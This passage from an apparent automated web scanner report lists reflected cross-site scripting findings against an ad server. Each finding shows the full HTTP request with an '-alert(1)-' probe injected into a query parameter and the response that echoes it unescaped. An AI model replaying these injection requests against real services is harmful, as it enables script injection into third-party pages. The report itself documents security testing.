Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9faa3"-alert(1)-"8bd79f549cf was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=9faa3"-alert(1)-"8bd79f549cf HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5950
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:37:16 GMT
Expires: Sun, 13 Feb 2011 14:37:16 GMT

document.write('\n<script src=\"http://s
...[SNIP]...
escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=9faa3"-alert(1)-"8bd79f549cfhttp://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/d%3B234423842%3B0-0%3B0%3B59000131%3B4307-300/250%3B39161866/39179653/1%3B%3B%7Efdr%3D235152408%3B0-0%3B0%3B58999179%3B4307-300/250%3B40323569/40
...[SNIP]...

3.65. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9655"-alert(1)-"20efb06d49b was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669d9655"-alert(1)-"20efb06d49b&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:44:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5948

document.write('\n<script src=\"http://s
...[SNIP]...
11Launch_SmallBignofall_728x90.jpg";
var minV = 6;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669d9655"-alert(1)-"20efb06d49b&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/l%3B234424146%3B1-0%3B0%3B59000132%3B3454-728/
...[SNIP]...

3.66. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e889'-alert(1)-'e48c02c599a was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=82806693e889'-alert(1)-'e48c02c599a&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:44:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5939

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=82806693e889'-alert(1)-'e48c02c599a&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/a%3B234424146%3B0-0%3B0%3B59000132%3B3454-728/
...[SNIP]...

3.67. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f280"-alert(1)-"cccb87eed26 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=10906506718f280"-alert(1)-"cccb87eed26&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:44:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5868

document.write('\n<script src=\"http://s
...[SNIP]...
ar minV = 6;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=10906506718f280"-alert(1)-"cccb87eed26&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/j%3B234424146%3B3-0%3B0%3B59000132%3B3454-728/90%3B40029750/40047537/1%3B%3B%7Efdr%3
...[SNIP]...

3.68. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79e1d'-alert(1)-'2bf17a85cba was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=109065067179e1d'-alert(1)-'2bf17a85cba&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:45:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5948

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=109065067179e1d'-alert(1)-'2bf17a85cba&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/l%3B234424146%3B1-0%3B0%3B59000132%3B3454-728/90%3B39161971/39179758/1%3B%3B%7Efdr%3
...[SNIP]...

3.69. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90df3'-alert(1)-'12b815bf85f was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d290df3'-alert(1)-'12b815bf85f&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:45:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5868

document.write('\n<script src=\"http://s
...[SNIP]...
get=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d290df3'-alert(1)-'12b815bf85f&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/j%3B234424146%3B3-0%3B0%3B59000132%3B3454-728/90%3B40029750/40047537/1%3B%3B%7Efdr%3D235152409%3B0-0%3B0%3B58999181%3B3454-728/90%3B
...[SNIP]...

3.70. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6907b"-alert(1)-"17bf953a0e1 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d26907b"-alert(1)-"17bf953a0e1&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:45:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5951

document.write('\n<script src=\"http://s
...[SNIP]...
';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d26907b"-alert(1)-"17bf953a0e1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/k%3B234424146%3B2-0%3B0%3B59000132%3B3454-728/90%3B39162039/39179826/1%3B%3B%7Efdr%3D235152409%3B0-0%3B0%3B58999181%3B3454-728/90%3B
...[SNIP]...

3.71. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83fcc"-alert(1)-"a1fa6bd5dce was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI783fcc"-alert(1)-"a1fa6bd5dce&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:45:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5948

document.write('\n<script src=\"http://s
...[SNIP]...
6;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI783fcc"-alert(1)-"a1fa6bd5dce&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/l%3B234424146%3B1-0%3B0%3B59000132%3B3454-728/90%3B39161971/39179758/1%3B%3B%7Efdr%3D235152409
...[SNIP]...

3.72. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a0a6'-alert(1)-'6b5c0eb747f was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI76a0a6'-alert(1)-'6b5c0eb747f&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:45:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5948

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=31057269&AN=1090650671&PG=FTBHI76a0a6'-alert(1)-'6b5c0eb747f&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/l%3B234424146%3B1-0%3B0%3B59000132%3B3454-728/90%3B39161971/39179758/1%3B%3B%7Efdr%3D235152409
...[SNIP]...

3.73. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bade'-alert(1)-'6159a4ff090 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=310572698bade'-alert(1)-'6159a4ff090&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:44:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5948

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=310572698bade'-alert(1)-'6159a4ff090&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/l%3B234424146%3B1-0%3B0%3B59000132%3B3454-728/90%3B39161971/39179758/1
...[SNIP]...

3.74. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80b8c"-alert(1)-"e3bcc653ccd was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=3105726980b8c"-alert(1)-"e3bcc653ccd&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:44:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5868

document.write('\n<script src=\"http://s
...[SNIP]...
728x90.JPG";
var minV = 6;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G&TargetID=3105726980b8c"-alert(1)-"e3bcc653ccd&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/j%3B234424146%3B3-0%3B0%3B59000132%3B3454-728/90%3B40029750/40047537/1
...[SNIP]...

3.75. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b292'-alert(1)-'f7712cd87b0 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G6b292'-alert(1)-'f7712cd87b0&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:44:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5948

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=G6b292'-alert(1)-'f7712cd87b0&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/l%3B234424146%3B1-0%3B0%3B59000132%3B3454-728/90%3B3
...[SNIP]...

3.76. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.39 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.39

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eff85"-alert(1)-"c9371b25c04 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.39;dcove=o;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/42000000000032594.1?!&&PID=8280669&UIT=Geff85"-alert(1)-"c9371b25c04&TargetID=31057269&AN=1090650671&PG=FTBHI7&ASID=f596fa1ca0f3477084cf8081619516d2&destination=;ord=1090650671? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
